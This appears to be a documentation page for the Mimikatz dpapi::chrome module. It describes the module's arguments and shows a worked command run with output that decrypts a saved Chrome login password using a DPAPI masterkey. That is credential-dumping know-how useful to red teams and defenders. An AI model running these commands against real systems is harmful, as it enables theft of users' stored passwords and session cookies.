chrome
dpapi::chrome dumps stored credentials and cookies from Chrome. It has the following command line arguments:
  • in: the C:\Users\<UserName>\AppData\Local\Google\Chrome\User Data\Default\Login Data for the saves logins and the C:\Users<UserName>\AppData\Local\Google\Chrome\User Data\Default\Cookies for the cookies
  • key: it is the key output value of the dpapi::masterkey in:"C:\Users\<UserName>\AppData\Roaming\Microsoft\Protect\SID\MasterKey_ID" /rpc. it is useful for offline dumping of Chrome. CoreSecurity has published an excellent guide on how this can be accomplished offline
  • state: TODO
  • encryptedkey: TODO
  • /password: the user's password to use for decryption
  • /masterkey: the masterkey to use for decryption. It can be obtained through sekurlsa::dpapi.
  • /unprotect: display the decryption results on screen
1
mimikatz # dpapi::chrome /in:"C:\Users\m3g9tr0n\AppData\Local\Google\Chrome\User Data\Default\Login Data" /masterkey:3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3
2
> Encrypted Key found in local state file
3
> Encrypted Key seems to be protected by DPAPI
4
* volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2dd89c50536c05bdcee1a56c395e752cf;Key:available
5
* masterkey : 3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3
6
> AES Key is: fd0635bf2e19d76231f649f48f4a90df3de80d3f83aa5ad016b3155fdab37fa2
7
โ€‹
8
URL : https://login.live.com/ ( https://login.live.com/login.srf )
10
* using BCrypt with AES-256-GCM
11
Password: MySecretPass
Copied!
Copy link